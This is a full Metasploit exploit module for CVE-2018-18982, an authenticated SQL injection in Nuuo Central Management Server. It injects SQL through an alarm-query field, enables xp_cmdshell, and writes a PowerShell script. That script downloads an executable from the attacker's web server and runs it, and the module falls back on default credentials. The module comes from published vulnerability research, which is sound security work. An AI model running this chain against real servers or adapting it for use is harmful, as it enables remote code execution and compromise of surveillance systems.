Nuuo Central Management SQL Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::Nuuo  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',  
'Description' => %q{  
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.  
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is  
installed by default, xp_cmdshell can be enabled and abused to achieve code execution.  
This module will either use a provided session number (which can be guessed with an auxiliary  
module) or attempt to login using a provided username and password - it will also try the  
default credentials if nothing is provided.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2018-18982' ],  
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],  
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],  
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]  
  
],  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground  
'Targets' =>  
[  
[ 'Nuuo Central Management Server <= v2.10.0', {} ],  
],  
'Notes' =>  
{  
'SideEffects' => [ ARTIFACTS_ON_DISK ]  
},  
'Privileged' => false, # we run as NETWORK_SERVICE  
'DisclosureDate' => 'Oct 11 2018',  
'DefaultTarget' => 0))  
register_options [  
Opt::RPORT(5180),  
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),  
OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])  
]  
end  
  
  
def inject_sql(sql, final = false)  
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]  
if final  
nucs_send_msg_async(sql)  
else  
nucs_send_msg(sql)  
end  
end  
  
# Handle incoming requests from the server  
def on_request_uri(cli, request)  
unless @pl  
print_error("A request came in, but the payload wasn't ready yet!")  
return  
end  
print_good('Sending the payload to CMS...')  
send_response(cli, @pl)  
  
Rex.sleep(3)  
  
print_status('Executing shell...')  
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)  
register_file_for_cleanup("c:/windows/temp/#{@filename}")  
end  
  
def create_hex_cmd(cmd)  
var = rand_text_alpha(2)  
hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"  
cmd.each_byte { |b|  
hex_cmd << b.to_i.to_s(16)  
}  
hex_cmd << "; exec (@#{var})"  
end  
  
def primer  
# we need to roll our own here instead of using the MSSQL mixins  
# (tried that and it doesn't work)  
service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"  
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")  
@filename = "#{rand_text_alpha_lower(8..10)}.exe"  
ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"  
download_pl = %{xp_cmdshell }  
download_pl << %{'cd C:\\windows\\temp\\ && }  
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }  
download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }  
download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }  
download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }  
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}  
  
print_status('Injecting PowerShell payload')  
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))  
register_file_for_cleanup("c:/windows/temp/#{ps1}")  
end  
  
def exploit  
nucs_login  
  
unless @nucs_session  
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')  
end  
  
@pl = generate_payload_exe  
  
#do not use SSL  
if datastore['SSL']  
ssl_restore = true  
datastore['SSL'] = false  
end  
  
begin  
Timeout.timeout(datastore['HTTPDELAY']) {super}  
rescue Timeout::Error  
datastore['SSL'] = true if ssl_restore  
end  
end  
end  
`